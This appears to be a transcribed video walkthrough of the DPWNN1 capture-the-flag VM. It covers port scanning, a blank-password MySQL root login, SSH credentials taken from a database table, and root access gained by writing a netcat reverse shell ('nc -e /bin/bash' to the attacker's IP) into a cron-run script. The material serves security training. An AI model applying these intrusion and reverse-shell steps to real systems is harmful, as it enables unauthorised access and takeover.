Hello everyone, let's go ahead and solve another VM named DPWNN1. So you can download this VM from this particular link, and I guess this is in VirtualBox, okay, VMware image. So I've already downloaded and loaded to my VMware player. So let me go ahead and start it. If you want to see the configuration, I can still show you that also. Configuration, I guess it's like 1 GB RAM and net, so this is perfectly fine. So now let's go ahead, open my terminal and start scanning for the IP address. Right, so I will type net discovery, sorry, right, and hyphen r 192.168.233/0/24. I guess this VM should be up by now. Yeah. So I guess this is the IP address for this particular VM, 192.168.233.138. So now let's go ahead and perform an nmap on it. Again, the usual nmap port scan, aggressive scan, right? And I'll leave it for some time for the scan to complete. Cool. So nmap scan is completed now. Let's look at the output. So over here, port number 22 is open. So I guess there must be some SSH login. Also, port number 80 is open. Yeah, some web application running, and 3306 is also open, right? Which means MySQL also is connected. So again, in this particular cases, I have told you earlier, like to go ahead and attack web application by running Darkbuster and Nikto also. Let's follow a different approach here. Let's target our MySQL in this particular case and see what we can gather, right? So I will type MySQL and hyphen u, let's say like the VM name, or you can type admin, right? Or hyphen p admin and then hyphen h and provide the target 192.168.138. It's asking for the password. Okay, and I will type admin. Okay, access denied for this particular user. So let's go ahead and try the same username, or you can try many approach. But after spending some time, you will eventually come at a specific username as root, right? So to get a root access, you can, or root user, you can type hyphen root. Again, of course, I encourage you to brute force with many different password, admin, blank, root, blank, and all those things. But finally, after some like 10-15 minutes of trial, you will get this particular user. I will just press enter. So it has taken blank password and allowed me to log into the MySQL. Now let's see what are the database those are available. So I can type so databases and colon. So these are the databases available. So as we saw already, port number 22 was open. So let's see what's inside the SSH. I can type use SSH, and this particular database is in use now. So I can type now. So tables, to see different tables. Okay, there is user tables. So I will type select statement now. Select star from users. Okay, sorry, I forgot to provide the. Let's see. Okay, Control C. I forgot to provide the parameter. So it's in blank one, so I can show database, or let's directly go ahead to use SSH, right? And so tables, tabalias tables, and I can select star, sorry, star from users. Now this is the user ID and password that we have got from SSH table. So this must be your SSH login. So let's try login with this specific user. So SSH, and then this is the username. You can copy paste directly to save time, right? At the rate 192.168.233.138, right? And it will ask the password. Again, the password is going to be this one, since we got from the database directly. So let's use this. Let's go. So we got the local shell, right? So this is how, using the MySQL also, we got the local shell here. So now let's go ahead and perform privilege escalation. Again, for privilege escalation, I said you need to enumerate more and more. You can go through that blog link, or you can Google about Linux privilege escalation for various command, like you need to enumerate different users, kernel version, everything. Right, so over here, let's see. So there is a specific shell file that is available already. Let's see its content.
Now, before jumping into real privilege escalation, let me clearly tell you that there are multiple ways to perform privilege escalation depending on the information that we gather. So, in this particular video, we are going to look at only how one of the method, that is your how we can perform privilege escalation using scheduled task. So, please do watch this video till the end to get the overall idea.
If you open, it says bin bash and log file. It is taking I think from var temp file, and there is one specific small script that is written for printing the log file content, I guess. Now whenever you see something like a shell file is already there, then you get an idea like there must have be something to do with modification, right? So let's go ahead and see what are the tasks those are scheduled already. Just there is another way for enumerating to get a privilege escalation. So to view that, you can type cat slash etc and cron tab. So this will tell you if any particular task that has been scheduled earlier. So over here, the content says like shell, bin bash, and mail to root, and there is a specific. I think this is running as an root user and taking from this specific location. Now this is a great hint because whatever we write inside log root.sh, that will be picked up and run by root user. So let's go ahead and make a reverse shell and try to listen from our Kali also, so that we can get a root shell. I'll initiate my listener, right? And let's say I'm going to say port number 9999. Now let's go ahead and make the same reverse shell with our logcat. So I will type nano log root.sh, right? And now let me delete these things. I think I don't need them. So even I don't need this thing, right? So I will write here nc-e. This is just for planting a reverse shell, right? You can also Google for bash reverse shell and run there. That's another way. Right? Hyphen bin bash h, and then I will say my IP address 192.168. Sorry, 168.233.137, and I will say port number. I guess I type port number 9999. So I'll say 9999 and ampersand. So this should do. So what will happen next time if this specific file is picked up, then I should get a reverse shell. Now all I have to do is wait for the particular task to picked up and run, right? So we'll go here. I think it's still waiting. I think it's taking slight more time. Let's go and verify if all information correct. Yeah, correct. So hopefully it should give a reverse shell here by now. Excellent. So now we got a reverse shell. Now I can type ID. This will show the root user, right? I can also type the content. Now this is our flag, right? So I can type cat dpwwn-01 flag.txt. Cool. So this is the flag. I mean, using the cron tab, we have got the flag.